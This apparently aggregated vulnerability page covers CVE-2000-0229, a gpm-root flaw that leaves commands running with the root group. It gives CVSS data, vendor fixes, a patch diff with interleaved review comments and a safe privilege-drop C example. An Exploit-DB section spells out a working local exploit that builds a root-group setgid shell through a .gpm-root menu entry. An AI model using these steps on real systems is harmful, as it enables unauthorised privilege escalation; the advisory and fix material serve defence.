CVE-2000-0229
CVSS7.2
Published: 2000-03-22 00:00:00
Last revised: 2008-09-10 15:03:40

[Original] gpm-root in the gpm package does not properly drop privileges, which allows local users to gain privileges by starting a utility from gpm-root.


[CNNVD] gpm setgid vulnerability in multiple Linux vendors' distributions (CNNVD-200003-041)

        gpm-root in the gpm package has a vulnerability: it does not correctly drop privileges, so a local user can gain privileges by invoking gpm-root functionality.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:debian:debian_linux:2.2::pre_potato
cpe:/o:redhat:linux:6.0::i386
cpe:/o:redhat:linux:6.1::i386
cpe:/o:suse:suse_linux:6.3  (SuSE Linux 6.3)
cpe:/o:alessandro_rubini:gpm:1.19
cpe:/o:suse:suse_linux:6.1  (SuSE Linux 6.1)
cpe:/o:alessandro_rubini:gpm:1.18.1
cpe:/o:debian:debian_linux:2.0  (Debian Linux 2.0)
cpe:/o:suse:suse_linux:6.2  (SuSE Linux 6.2)
cpe:/o:debian:debian_linux:2.2  (Debian Linux 2.2)
cpe:/o:redhat:linux:6.2::i386
cpe:/o:suse:suse_linux:6.0  (SuSE Linux 6.0)
cpe:/o:suse:suse_linux:5.3  (SuSE Linux 5.3)
cpe:/o:debian:debian_linux:2.1  (Debian Linux 2.1)

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0229
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0229
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-041
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1069
(UNKNOWN)  BID  1069
http://www.redhat.com/support/errata/RHSA-2000-045.html
(UNKNOWN)  REDHAT  RHSA-2000:045
http://www.redhat.com/support/errata/RHSA-2000-009.html
(UNKNOWN)  REDHAT  RHSA-2000:009
http://www.novell.com/linux/security/advisories/suse_security_announce_45.html
(UNKNOWN)  SUSE  20000405 Security hole in gpm < 1.18.1
http://archives.neohapsis.com/archives/bugtraq/2000-03/0242.html
(UNKNOWN)  BUGTRAQ  20000322 gpm-root

- Vulnerability information

gpm setgid vulnerability in multiple Linux vendors' distributions
High severity; design error
2000-03-22 00:00:00 2005-05-02 00:00:00
Local

- Advisories and patches

        A fix has been released for SuSE Linux. It is available at:
        6.1:
        ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/gpm.rpm
        6.2:
        ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/gpm.rpm
        6.3:
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/ap1/gpm.rpm
        The author has indicated that a fix will be present in version 1.19.1, which will be the final release by the author.
        A temporary solution is to disable gpm-root.
        A patch to fix the problem in gpm-1.19.0 was made available:
        diff -u -r -N ../gpm-1.19.0.orig/doc/doc.gpm ./doc/doc.gpm
        --- ../gpm-1.19.0.orig/doc/doc.gpm Mon Feb 7 23:34:00 2000
        +++ ./doc/doc.gpm Thu Mar 23 14:37:43 2000
        @@ -1969,6 +1969,12 @@
         be broken by this daemon. Things should be sufficiently secure, but
         if you find a hole please tell me about it.
        
        +@item -r
        + Always run commands as root instead of the user who owns the tty.
        + Implies -u. This is useful for those system administrators who
        + put menu entries to reboot or halt the system, start or stop
        + xdm, change keyboard layout etc.
        +
         @item -D
         Do not automatically enter background operation when started,
         and log messages to the standard error stream, not the syslog
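Review bot: the new -r text describes the convenience but not the exposure: with -r every menu entry in the configuration runs as root for any user who can reach the menu from a console, so the paragraph should state that -r is only safe when the configuration file is administrator-owned and that user .gpm-root files are ignored in this mode (that is what "Implies -u" means, but it deserves to be spelled out next to the reboot/halt examples).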
        diff -u -r -N ../gpm-1.19.0.orig/gpm-root.y ./gpm-root.y
        --- ../gpm-1.19.0.orig/gpm-root.y Thu Oct 7 20:15:18 1999
        +++ ./gpm-root.y Thu Mar 23 14:37:43 2000
        @@ -41,6 +41,7 @@
         #include
         #include /* sigaction() */
         #include /* pwd entries */
        +#include /* initgroups() */
         #include /* KDGETMODE */
         #include /* fstat() */
         #include /* uname() */
        @@ -117,6 +118,7 @@
         int opt_mod = 4; /* control */
         int opt_buf = 0; /* ask the kernel about it */
         int opt_user = 1; /* allow user cfg files */
        +int opt_root = 0; /* run everything as root */
        @@ -447,6 +449,7 @@
         void f__fix(struct passwd *pass)
         {
         setgid(pass->pw_gid);
        + initgroups(pass->pw_name, pass->pw_gid);
         setuid(pass->pw_uid);
         setenv("HOME", pass->pw_dir, 1);
         setenv("LOGNAME", pass->pw_name,1);
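Review bot: initgroups() is now called, but none of setgid(), initgroups() or setuid() in f__fix() has its return value checked, so a failed step would let the command run with the daemon's root group, which is exactly the failure mode of this advisory. Test each call and abort on failure, e.g. `if (setgid(pass->pw_gid) != 0) exit(1);`, `if (initgroups(pass->pw_name, pass->pw_gid) != 0) exit(1);`, `if (setuid(pass->pw_uid) != 0) exit(1);`. The ordering itself (groups and gid first, uid last while the process is still root) is correct.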
        @@ -539,7 +542,7 @@
         return 1;
         case 0:
        - setuid(uid);
        + if (opt_root) uid=0;
         pass=getpwuid(uid);
         if (!pass) exit(1);
         f__fix(pass);
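Review bot: removing the early `setuid(uid);` is the actual fix: that premature uid change was what made the later setgid() in f__fix() fail and leave the child with gid 0. With `if (opt_root) uid=0;` the child now deliberately runs as root when -r is given, so this branch relies on opt_user having been cleared together with opt_root; a comment here saying that -r must never be reachable with a user-owned configuration would make that dependency explicit.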
        @@ -926,6 +929,7 @@
         printf(" Valid options are\n"
         " -m modifier to use\n"
         " -u inhibit user configuration files\n"
        + " -r run commands as root\n"
         " -D don't auto-background and run as daemon\n"
         " -V increase amount of logged messages\n"
         );
        @@ -971,12 +975,13 @@
         int opt;
         gpm_log_daemon = 1;
        - while ((opt = getopt(argc, argv,"m:uDV::")) != -1)
        + while ((opt = getopt(argc, argv,"m:urDV::")) != -1)
         {
         switch (opt)
         {
         case 'm': opt_mod=getmask(optarg, tableMod); break;
         case 'u': opt_user=0; break;
        + case 'r': opt_root=1; opt_user=0; break;
         case 'D': gpm_log_daemon = 0; break;
         case 'V':
         gpm_debug_level += (0 == optarg ? 1 : strtol(optarg, 0, 0));
        A fix has been made available in gpm-1.19.2.
        -------------------------------------------------------------
        Turbo Linux users can use the following fix:
        Update the packages from our ftp server by running the following command for each package:
        rpm -Fvh ftp_path_to_filename
        Where ftp_path_to_filename is the following:
        ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-1.19.2-5.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-devel-1.19.2-5.i386.rpm
        Alessandro Rubini gpm 1.18.1
        Alessandro Rubini gpm 1.19
        S.u.S.E. Linux 5.3
        S.u.S.E. Linux 6.1
        S.u.S.E. Linux 6.2
        S.u.S.E. Linux 6.3
        

- Vulnerability information (19816)

gpm 1.18.1/1.19,Debian 2.x,RedHat 6.x,S.u.S.E 5.3/6.x gpm Setgid Vulnerability (EDBID:19816)
linux local
2000-03-22 Verified
0 Egmont Koblinger
N/A
source: http://www.securityfocus.com/bid/1069/info

A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error: the programmer attempted to revert to the running user's groups after having already called setuid() to the user's id. The setgid() call then fails, and the process keeps the group gpm-root is running as, which is usually the 'root' group.

This vulnerability requires that the user have console access.

cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}

click control-left mouse button, and click "setgid shell"
execute /tmp/sh 		
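As an added illustration of the privilege-drop order the description above turns on (this is example code written for this page, not gpm's own), the function below drops to a target uid/gid the way the patched f__fix() does, groups first, gid second, uid last, but also checks every return value, refuses to continue if any step fails, and confirms the drop cannot be reversed. The names `drop_privileges` and `privileges_verified` are my own.

```c
#define _GNU_SOURCE          /* for initgroups()/setgroups() in <grp.h> */
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 when both the real and effective uid/gid equal the targets. */
int privileges_verified(uid_t uid, gid_t gid)
{
    return getuid() == uid && geteuid() == uid &&
           getgid() == gid && getegid() == gid;
}

/* Drop to uid/gid in the only order that works: supplementary groups,
 * then gid, then uid, each step checked. Returns 0 on success or
 * -errno from the first failing step (the caller must not go on). */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Only root may rewrite the supplementary group list; an already
     * unprivileged process keeps the groups it started with. */
    if (geteuid() == 0) {
        struct passwd *pw = getpwuid(uid);
        int rc = pw ? initgroups(pw->pw_name, gid) : setgroups(1, &gid);
        if (rc != 0)
            return -errno;
    }
    /* gid first: once we are no longer root, setgid() is refused,
     * which is exactly how gpm-root ended up keeping gid 0. */
    if (setgid(gid) != 0)
        return -errno;
    if (setuid(uid) != 0)
        return -errno;
    /* A drop from root must be irreversible: regaining uid 0 means the
     * saved uid was left behind (e.g. seteuid() was used instead). */
    if (uid != 0 && setuid(0) == 0)
        return -EPERM;
    return privileges_verified(uid, gid) ? 0 : -EAGAIN;
}

int main(void)
{
    /* Dropping to our own ids is a no-op that still exercises every check. */
    int rc = drop_privileges(getuid(), getgid());
    printf("drop to uid %u gid %u: %s\n", (unsigned)getuid(),
           (unsigned)getgid(), rc == 0 ? "ok" : strerror(-rc));
    return rc != 0;
}
```

Run as root with a real target uid/gid to see the full path; as an unprivileged user the group step is skipped because setgroups() would be refused.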

- Vulnerability information

1262
gpm gpm-root Privilege Drop Failure
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-03-22 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Red Hat has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete
